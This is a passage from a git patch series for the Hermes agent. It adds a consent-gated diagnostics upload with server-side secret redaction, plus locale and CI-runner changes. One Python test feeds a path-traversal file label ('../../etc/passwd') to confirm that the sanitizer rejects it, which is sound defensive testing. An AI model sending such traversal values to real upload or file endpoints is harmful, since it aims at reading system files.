requestSendDiagnostics() + await confirmSendDiagnostics() + await confirmSendDiagnostics() + + expect(request).toHaveBeenCalledTimes(1) + } finally { + restoreDesktop() + restoreGateway() + } + }) + + it('dismiss clears the dialog state', () => { + requestSendDiagnostics() + dismissSendDiagnostics() + + expect($sendDiagnostics.get()).toBeNull() + }) +}) diff --git a/apps/desktop/src/store/send-diagnostics.ts b/apps/desktop/src/store/send-diagnostics.ts new file mode 100644 index 0000000000..6cbe9589b3 --- /dev/null +++ b/apps/desktop/src/store/send-diagnostics.ts @@ -0,0 +1,119 @@ +// "Send Diagnostics" — the error card's consent-gated debug-bundle upload. +// +// Flow: an error card (or any surface) calls requestSendDiagnostics() with +// optional error context → the modal host renders the privacy notice → the +// user explicitly clicks Upload → diagnostics.share_nous runs backend-side +// (collect + force-redact + Nous-S3 upload) → the modal shows the private +// view link plus the support handoff (GitHub Issues · Nous Portal Support · +// Discord). +// +// Consent is per-upload and explicit — no "always allow", mirroring the CLI's +// `hermes debug share --nous` confirmation contract. On a remote connection +// the backend bundles ITS OWN logs (the runtime that owns the failure); the +// local desktop.log is attached as a client-side extra so support sees both +// halves in one bundle. +import { atom } from 'nanostores' + +import { $gateway } from '@/store/gateway' + +export interface SendDiagnosticsResult { + expiresAt?: string + uploadId?: string + viewUrl?: string +} + +export interface SendDiagnosticsState { + /** Short text describing the failure that prompted the report (attached + * to the bundle as error-context.txt, redacted server-side). */ + errorContext?: string + error?: string + phase: 'consent' | 'done' | 'error' | 'uploading' + result?: SendDiagnosticsResult +} + +export const $sendDiagnostics = atom(null) + +/** Open the consent modal. No network I/O happens until the user confirms. */ +export function requestSendDiagnostics(errorContext?: string): void { + $sendDiagnostics.set({ errorContext, phase: 'consent' }) +} + +export function dismissSendDiagnostics(): void { + $sendDiagnostics.set(null) +} + +interface ShareNousResponse { + error?: string + expires_at?: string + ok: boolean + upload_id?: string + view_url?: string +} + +/** Read the LOCAL desktop log via Electron so a remote backend's bundle still + * carries the Desktop-side transport evidence. Best-effort: absence of the + * IPC (browser dashboard, older shells) just omits the file. */ +async function collectLocalExtras(): Promise> { + try { + const logs = await window.hermesDesktop?.getRecentLogs?.() + const lines = Array.isArray(logs?.lines) ? logs.lines : [] + + return lines.length ? { 'desktop.log': lines.join('\n') } : {} + } catch { + return {} + } +} + +// Bundle collection + upload legitimately takes a while (log reads + gzip + +// S3 leg); the default WS timeout is too tight for slow disks/links. +const SHARE_TIMEOUT_MS = 120_000 + +/** User confirmed — run the upload. Transitions consent → uploading → done/error. */ +export async function confirmSendDiagnostics(): Promise { + const current = $sendDiagnostics.get() + + if (!current || current.phase !== 'consent') { + return + } + + $sendDiagnostics.set({ ...current, phase: 'uploading' }) + + try { + const gateway = $gateway.get() + + if (!gateway) { + throw new Error('Hermes gateway unavailable') + } + + const extraFiles = await collectLocalExtras() + + const response = await gateway.request( + 'diagnostics.share_nous', + { + ...(current.errorContext ? { error_context: current.errorContext } : {}), + ...(Object.keys(extraFiles).length ? { extra_files: extraFiles } : {}) + }, + SHARE_TIMEOUT_MS + ) + + if (!response.ok) { + throw new Error(response.error || 'upload failed') + } + + $sendDiagnostics.set({ + ...current, + phase: 'done', + result: { + expiresAt: response.expires_at, + uploadId: response.upload_id, + viewUrl: response.view_url + } + }) + } catch (error) { + $sendDiagnostics.set({ + ...current, + error: error instanceof Error ? error.message : String(error), + phase: 'error' + }) + } +} diff --git a/hermes_cli/debug.py b/hermes_cli/debug.py index 0404e78371..f633df62f2 100644 --- a/hermes_cli/debug.py +++ b/hermes_cli/debug.py @@ -986,6 +986,12 @@ def _run_debug_share_nous(args, *, log_lines: int, redact: bool) -> None: "\nShare this private link with the Nous team — only Nous staff " "(via Google login) can open it." ) + print( + "\nPick up the discussion in:\n" + " GitHub Issues https://github.com/NousResearch/hermes-agent/issues\n" + " Nous Portal Support https://portal.nousresearch.com/help\n" + " Discord https://discord.gg/NousResearch" + ) def run_debug_delete(args): diff --git a/tests/tui_gateway/test_diagnostics_share_nous.py b/tests/tui_gateway/test_diagnostics_share_nous.py new file mode 100644 index 0000000000..b01608df51 --- /dev/null +++ b/tests/tui_gateway/test_diagnostics_share_nous.py @@ -0,0 +1,117 @@ +"""diagnostics.share_nous RPC — Desktop "Send Diagnostics" upload path. + +Contract pinned: +* Reuses the CLI ``--nous`` pipeline (collect_share_bundle → build_nous_bundle + → share_to_nous) with redaction FORCED on — the client cannot disable it. +* ``error_context`` and ``extra_files`` are redacted server-side, labels + sanitized, sizes capped. +* Upload failures return a structured ``{ok: False, error}`` envelope, never a + JSON-RPC error (the desktop renders them inline in the modal). +""" + +from __future__ import annotations + +import gzip +import json + +import pytest + +from tui_gateway import server + + +def _handler(): + fn = server._methods.get("diagnostics.share_nous") + assert fn is not None, "diagnostics.share_nous not registered" + return fn + + +@pytest.fixture() +def captured_upload(monkeypatch, tmp_path): + """Mock ONLY the network leg; the bundle pipeline runs for real.""" + captured: dict = {} + + def _fake_share(blob: bytes) -> dict: + captured["blob"] = blob + return { + "viewUrl": "https://nas.example/view/abc123", + "id": "abc123", + "expiresAt": "2026-09-05T00:00:00Z", + } + + import hermes_cli.diagnostics_upload as du + + monkeypatch.setattr(du, "share_to_nous", _fake_share) + return captured + + +def _envelope(blob: bytes) -> dict: + return json.loads(gzip.decompress(blob).decode("utf-8")) + + +def test_share_nous_uploads_redacted_bundle(captured_upload): + result = _handler()("rid-1", {}) + payload = result["result"] + + assert payload["ok"] is True + assert payload["view_url"] == "https://nas.example/view/abc123" + assert payload["upload_id"] == "abc123" + + envelope = _envelope(captured_upload["blob"]) + assert envelope["format"].startswith("hermes-debug-share/") + assert envelope["redacted"] is True + assert "report" in envelope["files"] + + +def test_share_nous_attaches_redacted_error_context(captured_upload): + secret = "sk-abc123def456ghi789jkl012mno345pqr678" + result = _handler()( + "rid-2", + {"error_context": f"layer: provider\ncode: rate_limit\nkey was {secret}"}, + ) + assert result["result"]["ok"] is True + + files = _envelope(captured_upload["blob"])["files"] + context = files.get("error-context.txt", "") + assert "layer: provider" in context + assert secret not in context, "secret leaked through error_context redaction" + + +def test_share_nous_extra_files_sanitized_and_redacted(captured_upload): + secret = "sk-abc123def456ghi789jkl012mno345pqr678" + result = _handler()( + "rid-3", + { + "extra_files": { + "desktop.log": f"boot ok\ntoken={secret}\n", + "../../etc/passwd": "nope", + "ok name (1).txt": "fine", + 7: "not-a-str-label", + "empty": " ", + } + }, + ) + assert result["result"]["ok"] is True + + files = _envelope(captured_upload["blob"])["files"] + assert "client/desktop.log" in files + assert secret not in files["client/desktop.log"] + # Path separators are stripped from labels; traversal shapes can't survive. + assert not any("/etc/passwd" in k or ".." in k for k in files) + assert "client/ok name (1).txt" in files + # Non-string labels and blank bodies are dropped. + assert not any(k.startswith("client/7") for k in files) + assert "client/empty" not in files + + +def test_share_nous_upload_failure_is_structured(monkeypatch): + import hermes_cli.diagnostics_upload as du + + def _boom(blob: bytes) -> dict: + raise RuntimeError("NAS unavailable") + + monkeypatch.setattr(du, "share_to_nous", _boom) + + result = _handler()("rid-4", {}) + payload = result["result"] + assert payload["ok"] is False + assert "NAS unavailable" in payload["error"] diff --git a/tui_gateway/methods_config.py b/tui_gateway/methods_config.py index 314b38d904..d92e5e38f0 100644 --- a/tui_gateway/methods_config.py +++ b/tui_gateway/methods_config.py @@ -125,7 +125,9 @@ def _(rid, params: dict) -> dict: try: with _profile_db(params) as db: if db is None: - return _ok(rid, {"projects": [], "active_id": None, "scoped_session_ids": []}) + return _ok( + rid, {"projects": [], "active_id": None, "scoped_session_ids": []} + ) tree, active_id = _build_project_tree( db, @@ -136,7 +138,11 @@ def _(rid, params: dict) -> dict: ) return _ok( rid, - {"projects": tree["projects"], "active_id": active_id, "scoped_session_ids": tree["scoped_session_ids"]}, + { + "projects": tree["projects"], + "active_id": active_id, + "scoped_session_ids": tree["scoped_session_ids"], + }, ) except Exception as e: return _err(rid, 5061, str(e)) @@ -160,7 +166,10 @@ def _(rid, params: dict) -> dict: # Drill-in only needs the entered project (which has sessions), so skip # the zero-session discovery tier entirely. tree, _active = _build_project_tree( - db, preview_limit=0, hydrate=True, session_limit=int(params.get("session_limit") or 5000), + db, + preview_limit=0, + hydrate=True, + session_limit=int(params.get("session_limit") or 5000), include_discovered=False, ) proj = next((p for p in tree["projects"] if p["id"] == project_id), None) @@ -320,7 +329,15 @@ def _(rid, params: dict) -> dict: return _ok(rid, {"value": "on" if on else "off"}) if key == "theme": display = _load_cfg().get("display") - raw = str(display.get("tui_theme", "auto") if isinstance(display, dict) else "auto").strip().lower() + raw = ( + str( + display.get("tui_theme", "auto") + if isinstance(display, dict) + else "auto" + ) + .strip() + .lower() + ) return _ok(rid, {"value": raw if raw in {"auto", "light", "dark"} else "auto"}) if key == "statusbar": display = _load_cfg().get("display") @@ -330,10 +347,17 @@ def _(rid, params: dict) -> dict: return _ok(rid, {"value": _coerce_statusbar(raw)}) if key == "focus": display = _load_cfg().get("display") - on = bool(display.get("focus_view", False)) if isinstance(display, dict) else False + on = ( + bool(display.get("focus_view", False)) + if isinstance(display, dict) + else False + ) return _ok( rid, - {"value": "on" if on else "off", "tool_progress": _load_tool_progress_mode()}, + { + "value": "on" if on else "off", + "tool_progress": _load_tool_progress_mode(), + }, ) if key == "mouse": display = _load_cfg().get("display") @@ -383,10 +407,15 @@ def _(rid, params: dict) -> dict: provider_configured = bool(_has_any_provider_configured()) provider = runtime.get("provider") or "provider" source = str(runtime.get("source") or "") - if not provider_configured and provider == "bedrock" and source in { - "iam-role", - "aws-sdk-default-chain", - }: + if ( + not provider_configured + and provider == "bedrock" + and source + in { + "iam-role", + "aws-sdk-default-chain", + } + ): return _ok( rid, { @@ -432,6 +461,84 @@ def _(rid, params: dict) -> dict: return _ok(rid, {"ok": False, "error": str(e)}) +@method("diagnostics.share_nous") +def _(rid, params: dict) -> dict: + """Upload a redacted debug bundle to Nous-internal diagnostics storage. + + Desktop's "Send Diagnostics" action (error card / diagnostics UI). Same + collection + force-redaction pipeline as ``hermes debug share --nous`` + (collect_share_bundle → build_nous_bundle → share_to_nous); redaction is + NOT client-controllable — this handler always redacts. + + Params (all optional): + - ``error_context``: short client-supplied text describing the failure + that prompted the report (the error card's layer/code/message blob). + Redacted server-side and attached as ``error-context.txt``. + - ``extra_files``: {label → text} of client-side artifacts the backend + can't see (e.g. the local desktop.log when this backend is remote). + Each value is force-redacted server-side before inclusion; labels are + sanitized and size-capped. + - ``log_lines``: report excerpt length (default 200). + + Consent lives with the CALLER: the desktop shows the privacy notice and + an explicit Upload button before invoking this. Structured envelope + (``ok``/``error``) rather than JSON-RPC errors so the client can render + upload failures inline. + """ + try: + from agent.redact import redact_sensitive_text + from hermes_cli.debug import build_nous_bundle, collect_share_bundle + from hermes_cli.diagnostics_upload import share_to_nous + + log_lines = params.get("log_lines") + if not isinstance(log_lines, int) or not (10 <= log_lines <= 2000): + log_lines = 200 + + bundle = collect_share_bundle(log_lines=log_lines, redact=True) + + error_context = params.get("error_context") + if isinstance(error_context, str) and error_context.strip(): + bundle["error-context.txt"] = redact_sensitive_text( + error_context.strip()[:8_000], force=True + ) + + # Client-side artifacts (local desktop.log on remote connections). + # Bounded: at most 4 files, 512KB of text each, sanitized labels — + # this is a diagnostics channel, not an arbitrary upload surface. + extra_files = params.get("extra_files") + if isinstance(extra_files, dict): + for label, text in list(extra_files.items())[:4]: + if not isinstance(label, str) or not isinstance(text, str): + continue + safe_label = "".join( + ch for ch in label if ch.isalnum() or ch in "._- ()" + ).strip()[:64] + # Collapse dot-runs and leading dots so traversal-shaped labels + # ("../../etc/passwd") can't survive even cosmetically. + while ".." in safe_label: + safe_label = safe_label.replace("..", ".") + safe_label = safe_label.lstrip(".").strip() + if not safe_label or not text.strip(): + continue + bundle[f"client/{safe_label}"] = redact_sensitive_text( + text[:524_288], force=True + ) + + blob = build_nous_bundle(bundle, redact=True) + res = share_to_nous(blob) + return _ok( + rid, + { + "ok": True, + "view_url": res.get("viewUrl") or res.get("view_url"), + "upload_id": res.get("id"), + "expires_at": res.get("expiresAt") or res.get("expires_at"), + }, + ) + except Exception as e: + return _ok(rid, {"ok": False, "error": str(e)}) + + def register(server) -> None: """Bind this module's handlers onto ``server``'s globals and registry.""" _registry.install(server) diff --git a/website/docs/user-guide/desktop.md b/website/docs/user-guide/desktop.md index c6d7439a6a..0a4cf668a0 100644 --- a/website/docs/user-guide/desktop.md +++ b/website/docs/user-guide/desktop.md @@ -424,6 +424,14 @@ generic error toast. The card offers recovery actions matched to the failure: or Cloud connection the button reads **Open Desktop logs**: it opens the local Desktop-side logs (transport evidence), since the failed turn's gateway/agent logs live on the remote machine. +- **Send diagnostics** — uploads a redacted debug bundle to Nous-internal + storage after an explicit consent prompt (same pipeline as + `hermes debug share --nous`; secrets are always redacted, the bundle is + viewable by Nous staff only and auto-deletes after 14 days). On success you + get a private view link to paste into your support thread, plus quick links + to GitHub Issues, Nous Portal Support, and Discord. On a remote or Cloud + connection the backend bundles its own agent/gateway logs and the local + Desktop log is attached alongside, so support sees both halves. - **Copy error details** — copies a compact plain-text summary (layer, code, provider/model, error message) you can paste into a bug report or Discord. From 0a9a449a32e7dc244ae5e7809050162bf47f93f1 Mon Sep 17 00:00:00 2001 From: Teknium <127238744+teknium1@users.noreply.github.com> Date: Fri, 21 Aug 2026 22:46:14 -0700 Subject: [PATCH 111/161] =?UTF-8?q?fix(desktop):=20Send=20Diagnostics=20re?= =?UTF-8?q?view=20fixes=20=E2=80=94=20consent=20accuracy,=20log-grade=20re?= =?UTF-8?q?daction,=20dismissal=20guard,=20linkless-success=20(review=20fe?= =?UTF-8?q?edback)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Addresses @helix4u's review on #92020: - Consent notice now matches the real --nous contract: full logs up to 512KB each, likely conversation content/tool outputs/file paths, viewable by Nous staff AND allowlisted Discord moderators (all 5 locales). - Client-supplied text (error_context + extra_files) rides _redact_log_text — the same upload-safe redactor as backend logs (secrets + email masking), not the weaker bare secret pass; regression test covers both. - ok:true without view_url or id becomes a structured failure; a returned id without a link renders an upload-ID fallback the user can quote. - Generation guard in the store: dismissal is immediate in every phase (incl. mid-upload); a stale completion can no longer resurrect or overwrite the dialog. Cancel button never disabled. --- .../components/send-diagnostics-dialog.tsx | 18 +++++++--- apps/desktop/src/i18n/ar.ts | 3 +- apps/desktop/src/i18n/en.ts | 3 +- apps/desktop/src/i18n/ja.ts | 3 +- apps/desktop/src/i18n/types.ts | 1 + apps/desktop/src/i18n/zh-hant.ts | 3 +- apps/desktop/src/i18n/zh.ts | 3 +- .../src/store/send-diagnostics.test.ts | 32 +++++++++++++++++ apps/desktop/src/store/send-diagnostics.ts | 27 +++++++++++++++ .../test_diagnostics_share_nous.py | 34 +++++++++++++++++++ tui_gateway/methods_config.py | 32 ++++++++++++----- 11 files changed, 140 insertions(+), 19 deletions(-) diff --git a/apps/desktop/src/components/send-diagnostics-dialog.tsx b/apps/desktop/src/components/send-diagnostics-dialog.tsx index 909ba8e973..a693602f13 100644 --- a/apps/desktop/src/components/send-diagnostics-dialog.tsx +++ b/apps/desktop/src/components/send-diagnostics-dialog.tsx @@ -47,7 +47,11 @@ export function SendDiagnosticsHost() { const busy = state.phase === 'uploading' return ( - (!open && !busy ? dismissSendDiagnostics() : undefined)} open> + // Dismissal is allowed in EVERY phase, including mid-upload: the store's + // generation guard makes a dismissed upload's completion a no-op, so Esc/ + // backdrop/Cancel are always an immediate way out (cancellation of the + // in-flight request itself stays best-effort). + (!open ? dismissSendDiagnostics() : undefined)} open> {state.phase === 'consent' || state.phase === 'uploading' ? ( <> @@ -61,7 +65,7 @@ export function SendDiagnosticsHost() { - )} - diff --git a/apps/desktop/src/components/send-diagnostics-dialog.tsx b/apps/desktop/src/components/send-diagnostics-dialog.tsx index a693602f13..e871d8fb47 100644 --- a/apps/desktop/src/components/send-diagnostics-dialog.tsx +++ b/apps/desktop/src/components/send-diagnostics-dialog.tsx @@ -23,11 +23,7 @@ import { import { useI18n } from '@/i18n' import { openExternalLink } from '@/lib/external-link' import { ExternalLink, Loader2Icon, Lock } from '@/lib/icons' -import { - $sendDiagnostics, - confirmSendDiagnostics, - dismissSendDiagnostics -} from '@/store/send-diagnostics' +import { $sendDiagnostics, confirmSendDiagnostics, dismissSendDiagnostics } from '@/store/send-diagnostics' const SUPPORT_LINKS = [ { key: 'github', url: 'https://github.com/NousResearch/hermes-agent/issues' }, @@ -60,9 +56,7 @@ export function SendDiagnosticsHost() { {copy.title} - - {copy.privacyNotice} - + {copy.privacyNotice} diff --git a/apps/desktop/src/i18n/ar.ts b/apps/desktop/src/i18n/ar.ts index 5d12987376..887ec354a6 100644 --- a/apps/desktop/src/i18n/ar.ts +++ b/apps/desktop/src/i18n/ar.ts @@ -14,7 +14,8 @@ export const ar = defineLocale({ doneTitle: 'تم إرسال التشخيصات', doneDescription: 'تم رفع الحزمة بشكل خاص. شارك الرابط أدناه في محادثة الدعم لكي يتمكن الفريق من رؤية سجلاتك.', failedTitle: 'فشل الرفع', - failedHint: 'يمكنك أيضاً تشغيل `hermes debug share --nous` من الطرفية، أو `hermes debug share --local` لعرض التقرير دون رفعه.', + failedHint: + 'يمكنك أيضاً تشغيل `hermes debug share --nous` من الطرفية، أو `hermes debug share --local` لعرض التقرير دون رفعه.', handoffLead: 'تابع النقاش في:', links: { github: 'GitHub Issues', diff --git a/apps/desktop/src/i18n/en.ts b/apps/desktop/src/i18n/en.ts index 9db9929516..26c50a4200 100644 --- a/apps/desktop/src/i18n/en.ts +++ b/apps/desktop/src/i18n/en.ts @@ -221,9 +221,11 @@ export const en: Translations = { copyLink: 'Copy link', uploadIdFallback: id => `No view link returned — quote upload ID ${id} to support`, doneTitle: 'Diagnostics sent', - doneDescription: 'Your bundle was uploaded privately. Share the link below in your support thread so the team can see your logs.', + doneDescription: + 'Your bundle was uploaded privately. Share the link below in your support thread so the team can see your logs.', failedTitle: 'Upload failed', - failedHint: 'You can also run `hermes debug share --nous` from a terminal, or `hermes debug share --local` to print the report without uploading.', + failedHint: + 'You can also run `hermes debug share --nous` from a terminal, or `hermes debug share --local` to print the report without uploading.', handoffLead: 'Pick up the discussion in:', links: { github: 'GitHub Issues', diff --git a/apps/desktop/src/i18n/ja.ts b/apps/desktop/src/i18n/ja.ts index 05c68d15a1..cf8015972a 100644 --- a/apps/desktop/src/i18n/ja.ts +++ b/apps/desktop/src/i18n/ja.ts @@ -222,9 +222,11 @@ export const ja = defineLocale({ copyLink: 'リンクをコピー', uploadIdFallback: id => `表示リンクが返されませんでした — サポートにアップロード ID ${id} をお伝えください`, doneTitle: '診断情報を送信しました', - doneDescription: 'バンドルは非公開でアップロードされました。サポートスレッドで以下のリンクを共有すると、チームがログを確認できます。', + doneDescription: + 'バンドルは非公開でアップロードされました。サポートスレッドで以下のリンクを共有すると、チームがログを確認できます。', failedTitle: 'アップロードに失敗しました', - failedHint: 'ターミナルから `hermes debug share --nous` を実行するか、`hermes debug share --local` でアップロードせずにレポートを表示することもできます。', + failedHint: + 'ターミナルから `hermes debug share --nous` を実行するか、`hermes debug share --local` でアップロードせずにレポートを表示することもできます。', handoffLead: '続きは次の場所で:', links: { github: 'GitHub Issues', diff --git a/apps/desktop/src/i18n/zh-hant.ts b/apps/desktop/src/i18n/zh-hant.ts index fe77df38bf..4be98f606b 100644 --- a/apps/desktop/src/i18n/zh-hant.ts +++ b/apps/desktop/src/i18n/zh-hant.ts @@ -217,7 +217,8 @@ export const zhHant = defineLocale({ doneTitle: '診斷資訊已傳送', doneDescription: '偵錯套件已私密上傳。在您的支援討論串中分享以下連結,團隊即可檢視您的日誌。', failedTitle: '上傳失敗', - failedHint: '您也可以在終端機執行 `hermes debug share --nous`,或執行 `hermes debug share --local` 在不上傳的情況下檢視報告。', + failedHint: + '您也可以在終端機執行 `hermes debug share --nous`,或執行 `hermes debug share --local` 在不上傳的情況下檢視報告。', handoffLead: '在以下位置繼續討論:', links: { github: 'GitHub Issues', diff --git a/apps/desktop/src/i18n/zh.ts b/apps/desktop/src/i18n/zh.ts index 5c0d95f165..3d8f0fdfe2 100644 --- a/apps/desktop/src/i18n/zh.ts +++ b/apps/desktop/src/i18n/zh.ts @@ -217,7 +217,8 @@ export const zh: Translations = { doneTitle: '诊断信息已发送', doneDescription: '调试包已私密上传。在您的支持会话中分享以下链接,团队即可查看您的日志。', failedTitle: '上传失败', - failedHint: '您也可以在终端运行 `hermes debug share --nous`,或运行 `hermes debug share --local` 在不上传的情况下查看报告。', + failedHint: + '您也可以在终端运行 `hermes debug share --nous`,或运行 `hermes debug share --local` 在不上传的情况下查看报告。', handoffLead: '在以下位置继续讨论:', links: { github: 'GitHub Issues', diff --git a/apps/desktop/src/store/send-diagnostics.test.ts b/apps/desktop/src/store/send-diagnostics.test.ts index 79ac2f1fde..43366e18db 100644 --- a/apps/desktop/src/store/send-diagnostics.test.ts +++ b/apps/desktop/src/store/send-diagnostics.test.ts @@ -8,7 +8,9 @@ import { requestSendDiagnostics } from '@/store/send-diagnostics' -function stubGateway(request: (method: string, params?: Record, timeout?: number) => Promise) { +function stubGateway( + request: (method: string, params?: Record, timeout?: number) => Promise +) { const original = $gateway.get() $gateway.set({ request } as never) @@ -145,9 +147,7 @@ describe('send-diagnostics store', () => { it('dismissal mid-upload is immediate and a stale completion cannot resurrect the dialog', async () => { let resolveRequest: (value: unknown) => void = () => {} - const request = vi.fn().mockImplementation( - () => new Promise(resolve => (resolveRequest = resolve)) - ) + const request = vi.fn().mockImplementation(() => new Promise(resolve => (resolveRequest = resolve))) const restoreGateway = stubGateway(request as never) const restoreDesktop = stubDesktopLogs(null) From 10f99bc15e70ba07434d4d7f42c33d2224f4d664 Mon Sep 17 00:00:00 2001 From: ethernet Date: Sat, 22 Aug 2026 01:14:07 -0400 Subject: [PATCH 114/161] ci: run the work lanes on larger runners and merge the split jobs Every Linux lane that does real work ran on a 4-core `ubuntu-latest`. The Python suite and the JS checks were split into many small jobs to make that size usable. Each split job repeated the full setup. In most of the JS jobs the repeated setup cost more than the work. The work lanes move to larger runners. Then the splits that existed only to make small runners usable go away. Python tests: 12 slices become 1 job on a 96-core runner. Slicing cost a matrix job, a duration cache, a per-slice artifact and a merge job. 96 cores clear the floor that the slowest single test file sets, which is about 82s. A second slice divides work that is already at that floor, and adds a second setup. Duration data from run 32522943054 gives the numbers behind this: 3178 files, 11645s in series. The worker count is explicit, because `run_tests.sh` defaults to twice the core count. A later commit sets it from a measurement on this hardware. JS checks: 14 jobs become 1. The matrix paid about 371s of repeated setup to spread about 612s of work. One larger runner installs one time. The three UI shard scripts and `run-ui-shard.mjs` are therefore removed, because the unsharded `test:ui` covers the same tests. The unit of parallel work inside that job is a CHECK, and not a workspace. apps/desktop is most of the payload, and its own `check` is a serial && chain. A spread across workspaces alone therefore leaves that chain as the long pole. A package that declares `check:*` sub-scripts gives one unit for each sub-script. That is the same selection rule the matrix used. The loop lives in `.github/scripts/run-workspace-checks.mjs`, so the same sequence runs on a laptop. It runs 11 units together, buffers the output of each one, and fails at the end with the full list. Children that share one stdout interleave their lines and make a failure hard to read. `npm run --ws check` stops at the first workspace that fails. `check:test:plugins` joins the desktop `check` script. The matrix prefers `check:*` sub-scripts over the plain `check` script, so `check:test:plugins` ran only as its own leg. Without this change the merge drops that suite and the job stays green. node_modules is cached on the lockfile, and `npm ci` is skipped on an exact hit. The `cache: npm` option of `setup-node` caches only the ~/.npm tarball cache, which leaves the extract and the postinstalls to pay again. The arm64 image build stays on a native arm64 runner. A build of linux/arm64 on an x64 host uses emulation. The docker test lane caps its workers at the core count. Each of those tests drives a container, so the docker daemon sets the limit and not the processor. `.github/actionlint.yaml` declares the runner labels. actionlint knows the GitHub-hosted labels only, and an undeclared label reads as an error that hides the real findings. The `detect` job checks out one file through a sparse checkout, and its timeout drops to 1 minute. It reads `scripts/ci/classify_changes.py` and nothing else. Verification: - actionlint reports 9 findings across all workflows. An unmodified HEAD with the same config reports the same 9. This change adds none. - A wrong label still fails. actionlint reports `ubuntu-latest-32-cor` and `ubuntu-latest-32-arm-cores`. - Every changed workflow parses, and `name` parses as a string. - A replay of the `save-durations` merge step against a three-artifact layout returns all 3178 entries. - An expansion of the npm script graph gives the same leaf commands for the parallel units and for a plain `npm run check`, in both directions. Against the 13-leg matrix the count is 13 to 11, and the whole difference is the three UI shards that collapse into one unsharded `check:test:ui`. - `--list` reports the 11 units, and a full local run completes and reports the time of each unit. - The runner labels cannot be verified here. The first real run is the test. --- .github/actionlint.yaml | 9 ++ .github/scripts/run-workspace-checks.mjs | 141 +++++++++++++++++++++++ .github/workflows/ci.yaml | 6 +- .github/workflows/docker.yml | 17 ++- .github/workflows/e2e-desktop.yml | 5 +- .github/workflows/js-tests.yml | 132 ++++++++------------- .github/workflows/nix.yml | 6 +- .github/workflows/rust-tests.yml | 5 +- .github/workflows/tests-os.yml | 6 +- .github/workflows/tests.yml | 113 ++++-------------- apps/desktop/package.json | 8 +- apps/desktop/scripts/run-ui-shard.mjs | 61 ---------- 12 files changed, 248 insertions(+), 261 deletions(-) create mode 100644 .github/actionlint.yaml create mode 100644 .github/scripts/run-workspace-checks.mjs delete mode 100644 apps/desktop/scripts/run-ui-shard.mjs diff --git a/.github/actionlint.yaml b/.github/actionlint.yaml new file mode 100644 index 0000000000..c641c828a0 --- /dev/null +++ b/.github/actionlint.yaml @@ -0,0 +1,9 @@ +# actionlint knows only GitHub-hosted runner labels. An org admin names the +# larger runners. Each one therefore reads as "unknown runner label" and hides +# the real findings, unless this file declares it. +self-hosted-runner: + labels: + - ubuntu-latest-96-core + - ubuntu-latest-32-core + - ubuntu-latest-32-arm-core + - windows-latest-32-core diff --git a/.github/scripts/run-workspace-checks.mjs b/.github/scripts/run-workspace-checks.mjs new file mode 100644 index 0000000000..eabc479877 --- /dev/null +++ b/.github/scripts/run-workspace-checks.mjs @@ -0,0 +1,141 @@ +// Run every workspace check at the same time and report all failures. +// +// The unit of work is a CHECK, and not a workspace. A package that declares +// `check:*` sub-scripts gives one unit for each sub-script. A package with a +// plain `check` gives that. This is the same selection rule the old CI matrix +// used, so the set of commands is unchanged. Only the schedule is different. +// +// This is not `npm run --ws check`, because that command is serial and stops +// at the first workspace that fails. This runs every unit and fails at the +// end with the full list. +// +// The output of each unit goes to a buffer and prints on completion inside a +// group that collapses. Children that write to one stdout together interleave +// their lines, and a failure is then hard to read. +// +// This also runs on a laptop: `node .github/scripts/run-workspace-checks.mjs`. +// `--concurrency N` sets the limit. `--list` prints the units and exits. + +import { execFileSync, spawn } from 'node:child_process' +import { availableParallelism } from 'node:os' + +const IS_CI = Boolean(process.env.GITHUB_ACTIONS) +const NPM = process.platform === 'win32' ? 'npm.cmd' : 'npm' + +/** @returns {{pkg: string, script: string}[]} */ +function discoverUnits() { + const raw = execFileSync(NPM, ['query', '.workspace'], { + encoding: 'utf-8', + shell: process.platform === 'win32', + }) + /** @type {{location: string, scripts?: Record}[]} */ + const pkgs = JSON.parse(raw) + + /** @type {{pkg: string, script: string}[]} */ + const units = [] + for (const pkg of pkgs) { + const scripts = pkg.scripts || {} + const subs = Object.keys(scripts).filter((s) => /^check:.+$/.test(s)) + if (subs.length > 0) { + for (const script of subs) units.push({ pkg: pkg.location, script }) + } else if (scripts.check) { + units.push({ pkg: pkg.location, script: 'check' }) + } + } + return units +} + +/** @param {{pkg: string, script: string}} unit */ +function runUnit(unit) { + return new Promise((resolve) => { + const started = Date.now() + const child = spawn(NPM, ['run', '--prefix', unit.pkg, unit.script], { + // Buffer, and do not inherit. Children that share one stdout + // interleave their lines, and a failure is then hard to read. + stdio: ['ignore', 'pipe', 'pipe'], + shell: process.platform === 'win32', + }) + /** @type {Buffer[]} */ + const chunks = [] + child.stdout.on('data', (c) => chunks.push(c)) + child.stderr.on('data', (c) => chunks.push(c)) + child.on('error', (err) => { + chunks.push(Buffer.from(`failed to spawn: ${err.message}\n`)) + resolve({ unit, code: 1, output: Buffer.concat(chunks).toString('utf-8'), ms: Date.now() - started }) + }) + child.on('close', (code) => { + resolve({ + unit, + code: code ?? 1, + output: Buffer.concat(chunks).toString('utf-8'), + ms: Date.now() - started, + }) + }) + }) +} + +async function main() { + const argv = process.argv.slice(2) + const units = discoverUnits() + + if (units.length === 0) { + console.error( + '::error::No workspace package declares a check script — refusing to report green having run nothing.', + ) + process.exit(1) + } + + if (argv.includes('--list')) { + for (const u of units) console.log(`${u.pkg} :: ${u.script}`) + return + } + + const flagIdx = argv.indexOf('--concurrency') + const concurrency = Math.max( + 1, + flagIdx !== -1 ? Number(argv[flagIdx + 1]) : Math.min(units.length, availableParallelism()), + ) + + console.log(`running ${units.length} checks, up to ${concurrency} at a time:`) + for (const u of units) console.log(` ${u.pkg} :: ${u.script}`) + console.log('') + + const queue = [...units] + /** @type {{unit: {pkg: string, script: string}, code: number, output: string, ms: number}[]} */ + const results = [] + + async function worker() { + for (;;) { + const unit = queue.shift() + if (!unit) return + const res = await runUnit(unit) + results.push(res) + const label = `${res.unit.pkg} :: ${res.unit.script}` + const secs = (res.ms / 1000).toFixed(1) + const status = res.code === 0 ? 'PASS' : 'FAIL' + if (IS_CI) console.log(`::group::${status} ${label} (${secs}s)`) + else console.log(`----- ${status} ${label} (${secs}s) -----`) + process.stdout.write(res.output.endsWith('\n') ? res.output : res.output + '\n') + if (IS_CI) console.log('::endgroup::') + } + } + + await Promise.all(Array.from({ length: Math.min(concurrency, units.length) }, worker)) + + const failed = results.filter((r) => r.code !== 0) + console.log('\n=== summary ===') + for (const r of [...results].sort((a, b) => b.ms - a.ms)) { + console.log( + ` ${r.code === 0 ? 'pass' : 'FAIL'} 